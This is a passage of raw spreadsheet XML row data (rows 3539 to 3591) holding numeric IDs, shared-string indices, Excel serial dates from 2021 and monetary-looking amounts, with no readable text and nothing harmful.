      <c r="J3539" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3540" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3540">
        <v>23713</v>
      </c>
      <c r="B3540">
        <v>1641</v>
      </c>
      <c r="C3540" t="s">
        <v>4077</v>
      </c>
      <c r="D3540" t="s">
        <v>12831</v>
      </c>
      <c r="E3540">
        <v>11</v>
      </c>
      <c r="F3540" t="s">
        <v>1746</v>
      </c>
      <c r="G3540" s="1">
        <v>44258</v>
      </c>
      <c r="H3540">
        <v>12000</v>
      </c>
      <c r="I3540" t="s">
        <v>9550</v>
      </c>
      <c r="J3540" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3541" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3541">
        <v>23716</v>
      </c>
      <c r="B3541">
        <v>1113</v>
      </c>
      <c r="C3541" t="s">
        <v>4085</v>
      </c>
      <c r="D3541" t="s">
        <v>12832</v>
      </c>
      <c r="E3541">
        <v>14</v>
      </c>
      <c r="F3541" t="s">
        <v>1016</v>
      </c>
      <c r="G3541" s="1">
        <v>44347</v>
      </c>
      <c r="H3541">
        <v>50000</v>
      </c>
    </row>
    <row r="3542" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3542">
        <v>23717</v>
      </c>
      <c r="B3542">
        <v>1527</v>
      </c>
      <c r="C3542" t="s">
        <v>4090</v>
      </c>
      <c r="D3542" t="s">
        <v>12833</v>
      </c>
      <c r="E3542">
        <v>16</v>
      </c>
      <c r="F3542" t="s">
        <v>1455</v>
      </c>
      <c r="G3542" s="1">
        <v>44284</v>
      </c>
      <c r="H3542">
        <v>11000000</v>
      </c>
      <c r="I3542" t="s">
        <v>12834</v>
      </c>
      <c r="J3542" t="s">
        <v>12835</v>
      </c>
    </row>
    <row r="3543" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3543">
        <v>23722</v>
      </c>
      <c r="B3543">
        <v>1527</v>
      </c>
      <c r="C3543" t="s">
        <v>4090</v>
      </c>
      <c r="D3543" t="s">
        <v>12833</v>
      </c>
      <c r="E3543">
        <v>16</v>
      </c>
      <c r="F3543" t="s">
        <v>3076</v>
      </c>
      <c r="G3543" s="1">
        <v>44284</v>
      </c>
      <c r="H3543">
        <v>4400000</v>
      </c>
      <c r="I3543" t="s">
        <v>12836</v>
      </c>
      <c r="J3543" t="s">
        <v>12837</v>
      </c>
    </row>
    <row r="3544" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3544">
        <v>23726</v>
      </c>
      <c r="B3544">
        <v>51</v>
      </c>
      <c r="C3544" t="s">
        <v>2152</v>
      </c>
      <c r="D3544" t="s">
        <v>12838</v>
      </c>
      <c r="E3544">
        <v>12</v>
      </c>
      <c r="F3544" t="s">
        <v>7296</v>
      </c>
      <c r="G3544" s="1">
        <v>44232</v>
      </c>
      <c r="H3544">
        <v>30000</v>
      </c>
      <c r="I3544" t="s">
        <v>10442</v>
      </c>
    </row>
    <row r="3545" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3545">
        <v>23727</v>
      </c>
      <c r="B3545">
        <v>51</v>
      </c>
      <c r="C3545" t="s">
        <v>2152</v>
      </c>
      <c r="D3545" t="s">
        <v>12838</v>
      </c>
      <c r="E3545">
        <v>12</v>
      </c>
      <c r="F3545" t="s">
        <v>9577</v>
      </c>
      <c r="G3545" s="1">
        <v>44232</v>
      </c>
      <c r="H3545">
        <v>10000</v>
      </c>
      <c r="I3545" t="s">
        <v>10442</v>
      </c>
    </row>
    <row r="3546" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3546">
        <v>23728</v>
      </c>
      <c r="B3546">
        <v>1527</v>
      </c>
      <c r="C3546" t="s">
        <v>4090</v>
      </c>
      <c r="D3546" t="s">
        <v>12833</v>
      </c>
      <c r="E3546">
        <v>16</v>
      </c>
      <c r="F3546" t="s">
        <v>12839</v>
      </c>
      <c r="G3546" s="1">
        <v>44284</v>
      </c>
      <c r="H3546">
        <v>24000</v>
      </c>
      <c r="J3546" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3547" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3547">
        <v>23729</v>
      </c>
      <c r="B3547">
        <v>1527</v>
      </c>
      <c r="C3547" t="s">
        <v>4090</v>
      </c>
      <c r="D3547" t="s">
        <v>12833</v>
      </c>
      <c r="E3547">
        <v>16</v>
      </c>
      <c r="F3547" t="s">
        <v>12840</v>
      </c>
      <c r="G3547" s="1">
        <v>44284</v>
      </c>
      <c r="H3547">
        <v>24000000</v>
      </c>
      <c r="J3547" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3548" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3548">
        <v>23730</v>
      </c>
      <c r="B3548">
        <v>1527</v>
      </c>
      <c r="C3548" t="s">
        <v>4090</v>
      </c>
      <c r="D3548" t="s">
        <v>12833</v>
      </c>
      <c r="E3548">
        <v>16</v>
      </c>
      <c r="F3548" t="s">
        <v>10130</v>
      </c>
      <c r="G3548" s="1">
        <v>44284</v>
      </c>
      <c r="H3548">
        <v>6000000</v>
      </c>
      <c r="J3548" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3549" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3549">
        <v>23731</v>
      </c>
      <c r="B3549">
        <v>1527</v>
      </c>
      <c r="C3549" t="s">
        <v>4090</v>
      </c>
      <c r="D3549" t="s">
        <v>12833</v>
      </c>
      <c r="E3549">
        <v>16</v>
      </c>
      <c r="F3549" t="s">
        <v>12841</v>
      </c>
      <c r="G3549" s="1">
        <v>44284</v>
      </c>
      <c r="H3549">
        <v>6000000</v>
      </c>
      <c r="J3549" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3550" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3550">
        <v>23732</v>
      </c>
      <c r="B3550">
        <v>35</v>
      </c>
      <c r="C3550" t="s">
        <v>16502</v>
      </c>
      <c r="D3550" t="s">
        <v>16503</v>
      </c>
      <c r="E3550">
        <v>17</v>
      </c>
      <c r="F3550" t="s">
        <v>2105</v>
      </c>
      <c r="G3550" s="1">
        <v>44232</v>
      </c>
      <c r="H3550" s="4">
        <v>2275000</v>
      </c>
      <c r="I3550" t="s">
        <v>12842</v>
      </c>
      <c r="J3550" t="s">
        <v>12096</v>
      </c>
    </row>
    <row r="3551" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3551">
        <v>23733</v>
      </c>
      <c r="B3551">
        <v>35</v>
      </c>
      <c r="C3551" t="s">
        <v>16502</v>
      </c>
      <c r="D3551" t="s">
        <v>16503</v>
      </c>
      <c r="E3551">
        <v>17</v>
      </c>
      <c r="F3551" t="s">
        <v>1455</v>
      </c>
      <c r="G3551" s="1">
        <v>44232</v>
      </c>
      <c r="H3551" s="4">
        <v>26409430</v>
      </c>
      <c r="I3551" t="s">
        <v>10703</v>
      </c>
      <c r="J3551" t="s">
        <v>9481</v>
      </c>
    </row>
    <row r="3552" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3552">
        <v>23734</v>
      </c>
      <c r="B3552">
        <v>1527</v>
      </c>
      <c r="C3552" t="s">
        <v>4090</v>
      </c>
      <c r="D3552" t="s">
        <v>12833</v>
      </c>
      <c r="E3552">
        <v>16</v>
      </c>
      <c r="F3552" t="s">
        <v>12843</v>
      </c>
      <c r="G3552" s="1">
        <v>44284</v>
      </c>
      <c r="H3552">
        <v>1825000</v>
      </c>
      <c r="I3552" t="s">
        <v>12844</v>
      </c>
    </row>
    <row r="3553" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3553">
        <v>23735</v>
      </c>
      <c r="B3553">
        <v>5240</v>
      </c>
      <c r="C3553" t="s">
        <v>8327</v>
      </c>
      <c r="D3553" t="s">
        <v>12845</v>
      </c>
      <c r="E3553">
        <v>14</v>
      </c>
      <c r="F3553" t="s">
        <v>11941</v>
      </c>
      <c r="G3553" s="1">
        <v>44251</v>
      </c>
      <c r="H3553">
        <v>600000</v>
      </c>
      <c r="J3553" t="s">
        <v>12846</v>
      </c>
    </row>
    <row r="3554" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3554">
        <v>23736</v>
      </c>
      <c r="B3554">
        <v>5240</v>
      </c>
      <c r="C3554" t="s">
        <v>8327</v>
      </c>
      <c r="D3554" t="s">
        <v>12845</v>
      </c>
      <c r="E3554">
        <v>14</v>
      </c>
      <c r="F3554" t="s">
        <v>11942</v>
      </c>
      <c r="G3554" s="1">
        <v>44251</v>
      </c>
      <c r="H3554">
        <v>400000</v>
      </c>
      <c r="J3554" t="s">
        <v>10272</v>
      </c>
    </row>
    <row r="3555" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3555">
        <v>23737</v>
      </c>
      <c r="B3555">
        <v>5240</v>
      </c>
      <c r="C3555" t="s">
        <v>8327</v>
      </c>
      <c r="D3555" t="s">
        <v>12845</v>
      </c>
      <c r="E3555">
        <v>14</v>
      </c>
      <c r="F3555" t="s">
        <v>9437</v>
      </c>
      <c r="G3555" s="1">
        <v>44251</v>
      </c>
      <c r="H3555">
        <v>400000</v>
      </c>
      <c r="J3555" t="s">
        <v>12847</v>
      </c>
    </row>
    <row r="3556" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3556">
        <v>23738</v>
      </c>
      <c r="B3556">
        <v>5240</v>
      </c>
      <c r="C3556" t="s">
        <v>8327</v>
      </c>
      <c r="D3556" t="s">
        <v>12845</v>
      </c>
      <c r="E3556">
        <v>14</v>
      </c>
      <c r="F3556" t="s">
        <v>1746</v>
      </c>
      <c r="G3556" s="1">
        <v>44251</v>
      </c>
      <c r="H3556">
        <v>300000</v>
      </c>
      <c r="J3556" t="s">
        <v>12848</v>
      </c>
    </row>
    <row r="3557" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3557">
        <v>23739</v>
      </c>
      <c r="B3557">
        <v>5240</v>
      </c>
      <c r="C3557" t="s">
        <v>8327</v>
      </c>
      <c r="D3557" t="s">
        <v>12845</v>
      </c>
      <c r="E3557">
        <v>14</v>
      </c>
      <c r="F3557" t="s">
        <v>10007</v>
      </c>
      <c r="G3557" s="1">
        <v>44251</v>
      </c>
      <c r="H3557">
        <v>100000</v>
      </c>
      <c r="J3557" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3558" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3558">
        <v>23740</v>
      </c>
      <c r="B3558">
        <v>5197</v>
      </c>
      <c r="C3558" t="s">
        <v>8335</v>
      </c>
      <c r="D3558" t="s">
        <v>12849</v>
      </c>
      <c r="E3558">
        <v>11</v>
      </c>
      <c r="F3558" t="s">
        <v>547</v>
      </c>
      <c r="G3558" s="1">
        <v>44232</v>
      </c>
      <c r="H3558">
        <v>10000</v>
      </c>
      <c r="J3558" t="s">
        <v>12850</v>
      </c>
    </row>
    <row r="3559" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3559">
        <v>23743</v>
      </c>
      <c r="B3559">
        <v>1116</v>
      </c>
      <c r="C3559" t="s">
        <v>4106</v>
      </c>
      <c r="D3559" t="s">
        <v>12851</v>
      </c>
      <c r="E3559">
        <v>26</v>
      </c>
      <c r="F3559" t="s">
        <v>9497</v>
      </c>
      <c r="G3559" s="1">
        <v>44267</v>
      </c>
      <c r="H3559">
        <v>70000</v>
      </c>
      <c r="I3559" t="s">
        <v>9550</v>
      </c>
      <c r="J3559" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3560" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3560">
        <v>23744</v>
      </c>
      <c r="B3560">
        <v>1116</v>
      </c>
      <c r="C3560" t="s">
        <v>4106</v>
      </c>
      <c r="D3560" t="s">
        <v>12851</v>
      </c>
      <c r="E3560">
        <v>26</v>
      </c>
      <c r="F3560" t="s">
        <v>3499</v>
      </c>
      <c r="G3560" s="1">
        <v>44267</v>
      </c>
      <c r="H3560">
        <v>10000</v>
      </c>
      <c r="J3560" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3561" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3561">
        <v>23745</v>
      </c>
      <c r="B3561">
        <v>1388</v>
      </c>
      <c r="C3561" t="s">
        <v>4060</v>
      </c>
      <c r="D3561" t="s">
        <v>12852</v>
      </c>
      <c r="E3561">
        <v>2</v>
      </c>
      <c r="F3561" t="s">
        <v>4062</v>
      </c>
      <c r="G3561" s="1">
        <v>44287</v>
      </c>
      <c r="H3561">
        <v>3600000</v>
      </c>
      <c r="I3561" t="s">
        <v>9603</v>
      </c>
    </row>
    <row r="3562" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3562">
        <v>23746</v>
      </c>
      <c r="B3562">
        <v>2557</v>
      </c>
      <c r="C3562" t="s">
        <v>5283</v>
      </c>
      <c r="D3562" t="s">
        <v>10187</v>
      </c>
      <c r="E3562">
        <v>16</v>
      </c>
      <c r="F3562" t="s">
        <v>9437</v>
      </c>
      <c r="G3562" s="1">
        <v>44287</v>
      </c>
      <c r="H3562">
        <v>30000</v>
      </c>
      <c r="J3562" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3563" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3563">
        <v>23747</v>
      </c>
      <c r="B3563">
        <v>1404</v>
      </c>
      <c r="C3563" t="s">
        <v>4050</v>
      </c>
      <c r="D3563" t="s">
        <v>12853</v>
      </c>
      <c r="E3563">
        <v>23</v>
      </c>
      <c r="F3563" t="s">
        <v>1746</v>
      </c>
      <c r="G3563" s="1">
        <v>44242</v>
      </c>
      <c r="H3563">
        <v>600000</v>
      </c>
      <c r="I3563" t="s">
        <v>12854</v>
      </c>
      <c r="J3563" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="3564" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3564">
        <v>23748</v>
      </c>
      <c r="B3564">
        <v>1404</v>
      </c>
      <c r="C3564" t="s">
        <v>4050</v>
      </c>
      <c r="D3564" t="s">
        <v>12853</v>
      </c>
      <c r="E3564">
        <v>23</v>
      </c>
      <c r="F3564" t="s">
        <v>3814</v>
      </c>
      <c r="G3564" s="1">
        <v>44242</v>
      </c>
      <c r="H3564">
        <v>600000</v>
      </c>
      <c r="I3564" t="s">
        <v>12856</v>
      </c>
      <c r="J3564" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="3565" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3565">
        <v>23749</v>
      </c>
      <c r="B3565">
        <v>1404</v>
      </c>
      <c r="C3565" t="s">
        <v>4050</v>
      </c>
      <c r="D3565" t="s">
        <v>12853</v>
      </c>
      <c r="E3565">
        <v>23</v>
      </c>
      <c r="F3565" t="s">
        <v>12857</v>
      </c>
      <c r="G3565" s="1">
        <v>44242</v>
      </c>
      <c r="H3565">
        <v>500000</v>
      </c>
      <c r="I3565" t="s">
        <v>9536</v>
      </c>
      <c r="J3565" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="3566" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3566">
        <v>23750</v>
      </c>
      <c r="B3566">
        <v>1404</v>
      </c>
      <c r="C3566" t="s">
        <v>4050</v>
      </c>
      <c r="D3566" t="s">
        <v>12853</v>
      </c>
      <c r="E3566">
        <v>23</v>
      </c>
      <c r="F3566" t="s">
        <v>12858</v>
      </c>
      <c r="G3566" s="1">
        <v>44242</v>
      </c>
      <c r="H3566">
        <v>500000</v>
      </c>
      <c r="I3566" t="s">
        <v>9536</v>
      </c>
      <c r="J3566" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="3567" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3567">
        <v>23751</v>
      </c>
      <c r="B3567">
        <v>1404</v>
      </c>
      <c r="C3567" t="s">
        <v>4050</v>
      </c>
      <c r="D3567" t="s">
        <v>12853</v>
      </c>
      <c r="E3567">
        <v>23</v>
      </c>
      <c r="F3567" t="s">
        <v>12859</v>
      </c>
      <c r="G3567" s="1">
        <v>44242</v>
      </c>
      <c r="H3567">
        <v>500000</v>
      </c>
      <c r="I3567" t="s">
        <v>9536</v>
      </c>
      <c r="J3567" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="3568" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3568">
        <v>23752</v>
      </c>
      <c r="B3568">
        <v>1404</v>
      </c>
      <c r="C3568" t="s">
        <v>4050</v>
      </c>
      <c r="D3568" t="s">
        <v>12853</v>
      </c>
      <c r="E3568">
        <v>23</v>
      </c>
      <c r="F3568" t="s">
        <v>12860</v>
      </c>
      <c r="G3568" s="1">
        <v>44242</v>
      </c>
      <c r="H3568">
        <v>500000</v>
      </c>
      <c r="I3568" t="s">
        <v>9536</v>
      </c>
      <c r="J3568" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="3569" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3569">
        <v>23753</v>
      </c>
      <c r="B3569">
        <v>1404</v>
      </c>
      <c r="C3569" t="s">
        <v>4050</v>
      </c>
      <c r="D3569" t="s">
        <v>12853</v>
      </c>
      <c r="E3569">
        <v>23</v>
      </c>
      <c r="F3569" t="s">
        <v>9561</v>
      </c>
      <c r="G3569" s="1">
        <v>44242</v>
      </c>
      <c r="H3569">
        <v>400000</v>
      </c>
      <c r="I3569" t="s">
        <v>9536</v>
      </c>
      <c r="J3569" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="3570" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3570">
        <v>23754</v>
      </c>
      <c r="B3570">
        <v>1404</v>
      </c>
      <c r="C3570" t="s">
        <v>4050</v>
      </c>
      <c r="D3570" t="s">
        <v>12853</v>
      </c>
      <c r="E3570">
        <v>23</v>
      </c>
      <c r="F3570" t="s">
        <v>7241</v>
      </c>
      <c r="G3570" s="1">
        <v>44242</v>
      </c>
      <c r="H3570">
        <v>400000</v>
      </c>
      <c r="I3570" t="s">
        <v>9536</v>
      </c>
      <c r="J3570" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="3571" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3571">
        <v>23755</v>
      </c>
      <c r="B3571">
        <v>625</v>
      </c>
      <c r="C3571" t="s">
        <v>1053</v>
      </c>
      <c r="D3571" t="s">
        <v>10980</v>
      </c>
      <c r="E3571">
        <v>17</v>
      </c>
      <c r="F3571" t="s">
        <v>1455</v>
      </c>
      <c r="G3571" s="1">
        <v>44232</v>
      </c>
      <c r="H3571">
        <v>440950</v>
      </c>
      <c r="I3571" t="s">
        <v>12861</v>
      </c>
      <c r="J3571" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3572" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3572">
        <v>23756</v>
      </c>
      <c r="B3572">
        <v>625</v>
      </c>
      <c r="C3572" t="s">
        <v>1053</v>
      </c>
      <c r="D3572" t="s">
        <v>10980</v>
      </c>
      <c r="E3572">
        <v>17</v>
      </c>
      <c r="F3572" t="s">
        <v>12862</v>
      </c>
      <c r="G3572" s="1">
        <v>44232</v>
      </c>
      <c r="H3572">
        <v>349851</v>
      </c>
      <c r="I3572" t="s">
        <v>12863</v>
      </c>
      <c r="J3572" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3573" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3573">
        <v>23757</v>
      </c>
      <c r="B3573">
        <v>625</v>
      </c>
      <c r="C3573" t="s">
        <v>1053</v>
      </c>
      <c r="D3573" t="s">
        <v>10980</v>
      </c>
      <c r="E3573">
        <v>17</v>
      </c>
      <c r="F3573" t="s">
        <v>2236</v>
      </c>
      <c r="G3573" s="1">
        <v>44232</v>
      </c>
      <c r="H3573">
        <v>173344</v>
      </c>
      <c r="I3573" t="s">
        <v>12863</v>
      </c>
      <c r="J3573" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3574" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3574">
        <v>23759</v>
      </c>
      <c r="B3574">
        <v>1500</v>
      </c>
      <c r="C3574" t="s">
        <v>16504</v>
      </c>
      <c r="D3574" t="s">
        <v>16505</v>
      </c>
      <c r="E3574">
        <v>16</v>
      </c>
      <c r="F3574" t="s">
        <v>2105</v>
      </c>
      <c r="G3574" s="1">
        <v>44265</v>
      </c>
      <c r="H3574" s="4">
        <v>1000000</v>
      </c>
      <c r="I3574" t="s">
        <v>9952</v>
      </c>
    </row>
    <row r="3575" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3575">
        <v>23760</v>
      </c>
      <c r="B3575">
        <v>515</v>
      </c>
      <c r="C3575" t="s">
        <v>1014</v>
      </c>
      <c r="D3575" t="s">
        <v>12864</v>
      </c>
      <c r="E3575">
        <v>16</v>
      </c>
      <c r="F3575" t="s">
        <v>1016</v>
      </c>
      <c r="G3575" s="1">
        <v>44369</v>
      </c>
      <c r="H3575">
        <v>100000</v>
      </c>
    </row>
    <row r="3576" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3576">
        <v>23761</v>
      </c>
      <c r="B3576">
        <v>2361</v>
      </c>
      <c r="C3576" t="s">
        <v>4926</v>
      </c>
      <c r="D3576" t="s">
        <v>12865</v>
      </c>
      <c r="E3576">
        <v>16</v>
      </c>
      <c r="F3576" t="s">
        <v>609</v>
      </c>
      <c r="G3576" s="1">
        <v>44267</v>
      </c>
      <c r="H3576">
        <v>3000</v>
      </c>
      <c r="I3576" t="s">
        <v>9536</v>
      </c>
      <c r="J3576" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3577" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3577">
        <v>23766</v>
      </c>
      <c r="B3577">
        <v>1512</v>
      </c>
      <c r="C3577" t="s">
        <v>4114</v>
      </c>
      <c r="D3577" t="s">
        <v>12866</v>
      </c>
      <c r="E3577">
        <v>16</v>
      </c>
      <c r="F3577" t="s">
        <v>364</v>
      </c>
      <c r="G3577" s="1">
        <v>44231</v>
      </c>
      <c r="H3577">
        <v>750000</v>
      </c>
      <c r="J3577" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="3578" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3578">
        <v>23768</v>
      </c>
      <c r="B3578">
        <v>911</v>
      </c>
      <c r="C3578" t="s">
        <v>3938</v>
      </c>
      <c r="D3578" t="s">
        <v>12867</v>
      </c>
      <c r="E3578">
        <v>2</v>
      </c>
      <c r="F3578" t="s">
        <v>673</v>
      </c>
      <c r="G3578" s="1">
        <v>44217</v>
      </c>
      <c r="H3578">
        <v>100000</v>
      </c>
      <c r="J3578" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3579" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3579">
        <v>23769</v>
      </c>
      <c r="B3579">
        <v>365</v>
      </c>
      <c r="C3579" t="s">
        <v>2226</v>
      </c>
      <c r="D3579" t="s">
        <v>12868</v>
      </c>
      <c r="E3579">
        <v>16</v>
      </c>
      <c r="F3579" t="s">
        <v>12869</v>
      </c>
      <c r="G3579" s="1">
        <v>44307</v>
      </c>
      <c r="H3579">
        <v>56000</v>
      </c>
      <c r="J3579" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="3580" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3580">
        <v>23770</v>
      </c>
      <c r="B3580">
        <v>365</v>
      </c>
      <c r="C3580" t="s">
        <v>2226</v>
      </c>
      <c r="D3580" t="s">
        <v>12868</v>
      </c>
      <c r="E3580">
        <v>16</v>
      </c>
      <c r="F3580" t="s">
        <v>9586</v>
      </c>
      <c r="G3580" s="1">
        <v>44307</v>
      </c>
      <c r="H3580">
        <v>60000</v>
      </c>
      <c r="J3580" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3581" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3581">
        <v>23771</v>
      </c>
      <c r="B3581">
        <v>365</v>
      </c>
      <c r="C3581" t="s">
        <v>2226</v>
      </c>
      <c r="D3581" t="s">
        <v>12868</v>
      </c>
      <c r="E3581">
        <v>16</v>
      </c>
      <c r="F3581" t="s">
        <v>9437</v>
      </c>
      <c r="G3581" s="1">
        <v>44307</v>
      </c>
      <c r="H3581">
        <v>5000</v>
      </c>
      <c r="J3581" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3582" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3582">
        <v>23772</v>
      </c>
      <c r="B3582">
        <v>365</v>
      </c>
      <c r="C3582" t="s">
        <v>2226</v>
      </c>
      <c r="D3582" t="s">
        <v>12868</v>
      </c>
      <c r="E3582">
        <v>16</v>
      </c>
      <c r="F3582" t="s">
        <v>609</v>
      </c>
      <c r="G3582" s="1">
        <v>44307</v>
      </c>
      <c r="H3582">
        <v>175000</v>
      </c>
      <c r="J3582" t="s">
        <v>11473</v>
      </c>
    </row>
    <row r="3583" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3583">
        <v>23773</v>
      </c>
      <c r="B3583">
        <v>365</v>
      </c>
      <c r="C3583" t="s">
        <v>2226</v>
      </c>
      <c r="D3583" t="s">
        <v>12868</v>
      </c>
      <c r="E3583">
        <v>16</v>
      </c>
      <c r="F3583" t="s">
        <v>12870</v>
      </c>
      <c r="G3583" s="1">
        <v>44307</v>
      </c>
      <c r="H3583">
        <v>50000</v>
      </c>
      <c r="J3583" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="3584" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3584">
        <v>23774</v>
      </c>
      <c r="B3584">
        <v>365</v>
      </c>
      <c r="C3584" t="s">
        <v>2226</v>
      </c>
      <c r="D3584" t="s">
        <v>12868</v>
      </c>
      <c r="E3584">
        <v>16</v>
      </c>
      <c r="F3584" t="s">
        <v>9435</v>
      </c>
      <c r="G3584" s="1">
        <v>44307</v>
      </c>
      <c r="H3584">
        <v>2000</v>
      </c>
      <c r="J3584" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3585" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3585">
        <v>23775</v>
      </c>
      <c r="B3585">
        <v>365</v>
      </c>
      <c r="C3585" t="s">
        <v>2226</v>
      </c>
      <c r="D3585" t="s">
        <v>12868</v>
      </c>
      <c r="E3585">
        <v>16</v>
      </c>
      <c r="F3585" t="s">
        <v>2236</v>
      </c>
      <c r="G3585" s="1">
        <v>44307</v>
      </c>
      <c r="H3585">
        <v>2000</v>
      </c>
      <c r="J3585" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3586" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3586">
        <v>23776</v>
      </c>
      <c r="B3586">
        <v>365</v>
      </c>
      <c r="C3586" t="s">
        <v>2226</v>
      </c>
      <c r="D3586" t="s">
        <v>12868</v>
      </c>
      <c r="E3586">
        <v>16</v>
      </c>
      <c r="F3586" t="s">
        <v>12871</v>
      </c>
      <c r="G3586" s="1">
        <v>44307</v>
      </c>
      <c r="H3586">
        <v>4086000</v>
      </c>
      <c r="I3586" t="s">
        <v>12872</v>
      </c>
      <c r="J3586" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3587" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3587">
        <v>23777</v>
      </c>
      <c r="B3587">
        <v>365</v>
      </c>
      <c r="C3587" t="s">
        <v>2226</v>
      </c>
      <c r="D3587" t="s">
        <v>12868</v>
      </c>
      <c r="E3587">
        <v>16</v>
      </c>
      <c r="F3587" t="s">
        <v>3763</v>
      </c>
      <c r="G3587" s="1">
        <v>44307</v>
      </c>
      <c r="H3587">
        <v>10000</v>
      </c>
      <c r="J3587" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="3588" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3588">
        <v>23778</v>
      </c>
      <c r="B3588">
        <v>365</v>
      </c>
      <c r="C3588" t="s">
        <v>2226</v>
      </c>
      <c r="D3588" t="s">
        <v>12868</v>
      </c>
      <c r="E3588">
        <v>16</v>
      </c>
      <c r="F3588" t="s">
        <v>8295</v>
      </c>
      <c r="G3588" s="1">
        <v>44307</v>
      </c>
      <c r="H3588">
        <v>500000</v>
      </c>
      <c r="I3588" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="3589" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3589">
        <v>23779</v>
      </c>
      <c r="B3589">
        <v>365</v>
      </c>
      <c r="C3589" t="s">
        <v>2226</v>
      </c>
      <c r="D3589" t="s">
        <v>12868</v>
      </c>
      <c r="E3589">
        <v>16</v>
      </c>
      <c r="F3589" t="s">
        <v>12873</v>
      </c>
      <c r="G3589" s="1">
        <v>44307</v>
      </c>
      <c r="H3589">
        <v>2000</v>
      </c>
      <c r="I3589" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="3590" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3590">
        <v>23780</v>
      </c>
      <c r="B3590">
        <v>42</v>
      </c>
      <c r="C3590" t="s">
        <v>16506</v>
      </c>
      <c r="D3590" t="s">
        <v>16507</v>
      </c>
      <c r="E3590">
        <v>12</v>
      </c>
      <c r="F3590" t="s">
        <v>9586</v>
      </c>
      <c r="G3590" s="1">
        <v>44231</v>
      </c>
      <c r="H3590" s="4">
        <v>25000</v>
      </c>
      <c r="J3590" t="s">
        <v>12874</v>
      </c>
    </row>
    <row r="3591" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3591">
        <v>23781</v>
      </c>
      <c r="B3591">
        <v>5251</v>
      </c>
      <c r="C3591" t="s">
        <v>8342</v>
      </c>
      <c r="D3591" t="s">
        <v>12875</v>
      </c>
      <c r="E3591">
        <v>32</v>
      </c>
      <c r="F3591" t="s">
        <v>9561</v>
      </c>
